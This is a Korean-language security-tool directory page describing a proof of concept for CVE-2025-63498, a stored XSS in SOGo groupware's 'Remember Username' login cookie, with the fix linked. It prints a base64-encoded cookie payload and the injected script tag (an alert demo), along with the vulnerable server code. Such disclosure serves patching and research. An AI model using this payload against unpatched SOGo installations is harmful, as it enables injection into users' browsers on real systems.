Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-63498 — Stored XSS 개념 증명(PoC)으로, SOGo 그룹웨어의 'Remember Username' 쿠키를 악용하여 로그인 엔드포인트를 통해 JavaScript 페이로드를 주입합니다. | Kitploit
도구/GitHubGitHub/xryptoh/cve-2025-63498
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubxryptoh/cve-2025-63498

CVE-2025-63498

Stored XSS 개념 증명(PoC)으로, SOGo 그룹웨어의 'Remember Username' 쿠키를 악용하여 로그인 엔드포인트를 통해 JavaScript 페이로드를 주입합니다.

저장소 보기
2139개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Stored XSS in cookie Alinto/SOGo

연구자: Daniil Khomichenok, Alexander Klimenko

영향을 받는 버전 < 5.12.4 ( https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.4 )

날짜: 01.10.2025


"사용자 이름 기억" 기능이 활성화되면, 브라우저 쿠키에 base64로 인코딩된 필드가 추가됩니다.

이 값은 /SOGo/connect 엔드포인트로 전송되는 POST 요청의 "userName" 매개변수에서 가져옵니다.

서버 응답에는 set-cookie와 함께 base64로 인코딩된 XSS 페이로드가 포함됩니다:

Set-Cookie: SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;

"userName" 매개변수에 대한 POST 요청에 다음 값을 추가하면:

[email protected]

이는 자바스크립트 인젝션을 포함하며, 사용자가 인증 페이지를 다시 방문할 때 실행되고 사용자 브라우저의 "SOGoLogin" 쿠키에 저장됩니다.

인젝션이 포함된 인증 페이지 코드:

root@kitploit:~
<script type="text/javascript">
var cookieUsername = "[email protected]</script><script>alert('123')</script>";
var language = 'English';
var loginHint = ''
</script>

XSS 인젝션을 매개변수 값으로 허용하는 로그인 기억 설정 쿠키 코드:

root@kitploit:~
if (rememberLogin)
  [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
  else
  [response addCookie: [self _cookieWithUsername: nil]];

수정: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c

도구 다운로드